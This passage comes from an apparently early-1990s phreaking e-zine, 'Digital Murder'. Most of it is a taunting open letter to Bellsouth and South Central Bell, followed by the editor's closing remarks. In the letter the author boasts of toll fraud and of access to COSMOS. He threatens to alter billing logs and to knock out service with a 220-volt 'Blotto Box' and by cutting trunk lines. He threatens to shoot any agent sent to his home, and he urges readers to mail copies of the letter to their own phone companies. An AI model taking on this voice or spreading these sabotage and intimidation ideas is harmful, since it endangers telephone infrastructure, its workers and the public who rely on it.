     conversation, I decided to write a file I wanted to send to SCB
     but then it started to get so stupid but Morpheus insisted it be
     included in the magazine to cause more trouble.
    ----------------------------------

          Dear Bellsouth INC,

          It has come to my attention that you have slacked off in
     your security procedures over the past few years.  Namely your
     At&t system.  I know that when a calling card is illegally used
     overseas and is valid in the states, it is then destroyed.
     Well, if you had an average I.Q., possibly 2-10 for a Bellsouth
     employee, then you would know that Blue Boxing can still be
     done from overseas to here.  Have you not ever fixed that problem
     yet?  Get real.  This is the information age and you are supposed
     to be the experts of it, with CLASS and 5AESS, along with the
     911 system, which has many flaws.  If you have not figured out
     how to stop the hacker revolution by now, then you might as well
     give up.  The Bellsouth company, in conjunction with At&t, are
     plauged with many loopholes that can be exploited by those who
     understand and can manipulate the system.  You can expect to hear
     from our little group of seasoned hackers, and bring the networks
     to a downfall.  Those targeted are:  COSMOS, MIZAR, and the heart
     of the X-25 systems.  You may think that you are smart in the fact
     that you have stopped some of the best, like Legion of Doom and
     Craig Neidorf.  You can do nothing to stop us, so pretty soon your
     jobs may be in jeopardy.  So I am just writing this letter to let
     you know that this is the end of the beginning. The information
     age is at it's peak, and us, the pirates or so called hackers.
     Friends like Tristan have made connections with the media and have
     told the public about how the system could be exploited by those few
     talented individuals.  Consider yourself lucky that the phone network
     of this current time has not totally been destroyed. As I said
     before, this is just the prelude to the havoc and evilness that is
     about to be brought unto the phone networks of the world.

          Do you not believe this to be true?  Just count up the annual
     toll-fraud and you will see that a lot of people are serious about
     what they do and how they do it.  That just goes to show you that
     free phone calls are not all there is to phreaking.  It is the
     interaction of the trunk lines and being able to play the role of an
     under-paid low-life operator, and control the networks, to do our
     bidding.





                                                                       18




          After reading the forementioned text, consider this.
     Why don't you just save yourself a lot of time and money, and
     just bring back the 5xB crossbar system.  By showing your ultimate
     incompetance, when you invented the revolutionary DTMF matrix, you
     did only one thing wrong.  You created the phreaker.  You published
     the tones for controlling the network, i.e. 2600, KT, SP, and TASI.
     But at first, pink noise could be used.  Now, blue boxing can not
     be used here inside the United States.  Back in the good ole days,
     it was fun to call for free, and start up a teleconference using
     a blue box.  Those were the days, but you have ruined them for the
     younger phreaking community.

          My one plan that I want to carry out is the legendary
     Blotto Box.  If you are smart enuff to call yourself an electronic
     enigineer, then you should know what this device can do.  That,
     coupled with opening 20-30 manholes and making spaghetti out of
     the trunk lines, will help the repairman earn a little extra money
     in overtime to help keep food on the table at home. In effect, the
     Blotto Box will pump 220 volts into a loop distribution block,
     therefore causing part of the area code to be out of service.  You
     should have fun trying to sort that mess out.

          Another pastime of me and my friends is obtaning telephone
     equipment.  I would say that I have 2-3 repeater test sets, several
     tone test sets, TS-21, a Wiltron CMTS test set, which did make a
     good gun target, a cool OFFICIAL South Central Bell hat, several
     boxes or repeater cartridges, and a nice digital line tester.
     If you should ever send a special agent to my house, should you
     ever find it, I would have no choice but to turn him into an
     Official South Central Bell target, and to be quite honest, I
     would not feel any remorse.  My hatred for Bell rises above all
     levels of comprehension that you can fanthom.

          The only way for me to release my hatred toword you is to
     find ways around any security you may come up with in the future,
     because what you have now is not much of a challenge.  Your Lineage
     2000 Remote Access System, RAS for short, or your VAX/VMS systems
     at Bell Labs ar not too interesting at this time.  However, should
     you ever implement new and extensive protection, I may give it a
     try, which ultimately would aid you in impleminting higher levels of
     security.  This may make you feel like you actually have a meaningful
     existance in todays job market but it is people like me and the rest
     of the hackers that give security ANALysts their jobs.

          In closing, all I have to say is that as of now, I am bored
     with your development.  But now, with my aquisition of a COSMOS
     account, I will attempt to access your AMA logs, to help a few
     friends of mine, with their long diastance calling record. I am
     sure that by you trying to figure out how I am doing this, you
     will provide me with a small challenge.  Have you ever heard of LOD?
     Well just imagine that group, 5 times better, and about 4 people with
     a severe hatred for Bell and everything concerning it.  I am trying
     to alert you to this, because I am REALLY bored.  That is all there
     is to it.  COSMOS has many possibilites.  I have dialups, passwords,
     wire centers, complete information on the system.  I've been doing
     some checking on it and within the week, you shall see the fruits
     of my long and hard labor intensive work.  Oh well, nice to talk
     to you.  Hopefully this letter will reach someone who will realize



                                                                       19




     the true potential of it.  Because talking to a TSPS operator is
     like talking to a 976 phone sex operator.  They give out all types
     of information and if you talk right to them you don't have to pay.
          If you want to contact me then look on any of the more popular
     networks.  For example, Internet, Bitnet, QSD, or any of the higher
     level Bell Labs mainframes.  Superuser status is so easy to obtain
     on your systems.

                                       Signed,
                                       (Your alias here)
-------------------------------------
          There, as you can see, is one my extremely phucked
      up ideas of a letter to end to my local CO.  Make copies of
      this and send them to YOUR local phone Co.  I'm sure they will
      appreciate hearing from their customers on a more technical
      level.  Until next time, see you in the Funny Farm...
-------------------------------------

              ----------------
               Heaven's Trash             -Final Words from Morpheus
              ----------------

           Thanks for reading Digital Murder.  We welcome anyone that
      writes decent articles and believes in the free exchange of
      information to our staff.  If you would like to write for DM then
      send us a letter or call one of our support boards.  Right now
      our only support board is Backdoor @ 901.386.6455 but the list
      will grow very soon as I work out the details with other US SysOps.

           Here is the file-naming format we use to denote issue
      number and version of DM when spreading it to others on boards:

                       ()-----Version Number: 40 - 40 col. version
                 DM#00180                     80 - 80 col. version
      Mag.name---()   ^                       64 - C=64 prg. version
                      !-------Issue Number

      Needless to say, the 40 and 80 col. versions are in ASCII while
      the 64 version is an ml coded version (in the works).  I thought
      it would be a good idea to make different versions since phreaking
      and hacking is the same for all comp. types.  The only version we
      have ignored is the 22 column version for Commodore Vic 20 users.
      If you are hacking and phreaking with one of those old relics and
      aren't clinicly insane yet then consider upgrading your system so
      you won't have to bug your friend to let you read DM every month
      on his system.

           If you plan on printing the mag out, you have probably already
      noticed that the pages are numbered, spaced out, etc.  enjoy.

           You can find Digital Murder on most of the better boards in
      the United Socialist Republic of Amerika.  Write us or leave email
      if you have ANY questions, comments, additional info on an article,
      new articles, etc. . .  We will reply to all input we recieve
      either through mail (regular postal service or Email) or in the
      letters section of future issues of Digital Murder.

           Next issue will be out (hopefully Nov. 15th) just in time
      for Thanksgiving.  Then you can thank me for giving up all my
      extra time I have, when I'm not busy with college or my girlfriend,
      to edit and publish yet another stodgy electronic magazine full of
      free information.  Till next month or until Dan Quayle's IQ is
      higher than an AT&T manhole cover, so long.